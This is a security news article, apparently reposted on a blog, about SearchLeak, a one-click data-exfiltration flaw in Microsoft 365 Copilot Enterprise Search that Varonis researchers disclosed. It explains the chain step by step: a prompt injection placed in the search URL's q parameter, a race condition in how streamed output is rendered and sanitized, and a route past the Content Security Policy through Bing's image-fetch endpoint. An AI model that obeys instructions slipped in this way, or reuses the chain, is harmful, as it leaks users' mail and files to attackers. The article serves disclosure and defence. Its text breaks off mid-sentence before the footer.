A single click on a trusted Microsoft link could have let an attacker pull emails, calendar details, and indexed files out of Microsoft 365 Copilot Enterprise Search.
Researchers at Varonis Threat Labs chained three bugs into a one-click exfiltration path they call SearchLeak. Because the link pointed to a real microsoft.com domain, traditional anti-phishing and URL filtering tools were unlikely to flag it.
No prompt, no password, no second click. Microsoft assigned CVE-2026-42824 and marked it critical; the CVSS scores ran lower and disagreed, 6.5 from Microsoft and 7.5 from the National Vulnerability Database. The company mitigated the flaw on its backend, so customers have nothing to worry about, and Varonis presented a proof-of-concept, not observed exploitation.
Three bugs, one click
Microsoft’s advisory describes the flaw as a command injection that can expose information over a network. In practice, SearchLeak stacks one AI-specific weakness on two old web bugs, and each link is needed for the next.
The entry point is the q parameter in the Copilot Enterprise Search URL. It is meant for a natural-language query, but Copilot reads whatever sits there as instructions, not just a search string.
Varonis calls this Parameter-to-Prompt injection. An attacker writes a URL that tells Copilot to search the mailbox, take an email title, and place it inside an image URL. The victim types nothing. They click, and Copilot does the work.
Next is a race condition in how the response renders. Microsoft’s guardrail wraps Copilot output in blocks so the browser treats markup as text. The catch is timing: the wrapping happens after Copilot finishes generating, but the browser renders the stream as it arrives. The injected tag is drawn and fires its request before the sanitizer runs. By the time the output is neutralized, the request has already left.
The last link gets the data past the page’s Content Security Policy. The CSP on m365.cloud.microsoft blocks images from arbitrary domains, but it allowlists *.bing.com. Bing’s “Search by Image” endpoint accepts an image URL and fetches it server-side to analyze it. Point that fetch at an attacker’s server with the stolen text encoded in the path, and Bing retrieves it. The browser’s CSP never applies, because the request comes from Bing’s infrastructure. Bing becomes the exfiltration proxy. The CSP allowlist does the hiding.
Put together: the victim clicks, Copilot searches their data, the response embeds a value like an email subject in a Bing image URL, the browser calls Bing during streaming, and Bing pulls the attacker’s URL. The attacker reads it off their own logs, for example, a request for /Your_Security_Code_847291/img.png.
What an attacker gets
Copilot Enterprise can reach whatever the signed-in user can, through their Microsoft Graph access, and the attacker inherits that reach without ever logging in.
The most…
Source link
Disclaimer
We strive to uphold the highest ethical standards in all of our reporting and coverage. We blogs.grocliq.com want to be transparent with our readers about any potential conflicts of interest that may arise in our work. It’s possible that some of the investors we feature may have connections to other businesses, including competitors or companies we write about. However, we want to assure our readers that this will not have any impact on the integrity or impartiality of our reporting. We are committed to delivering accurate, unbiased news and information to our audience, and we will continue to uphold our ethics and principles in all of our work. Thank you for your trust and support.
Website Upgradation is going on for any glitch kindly connect at [email protected]
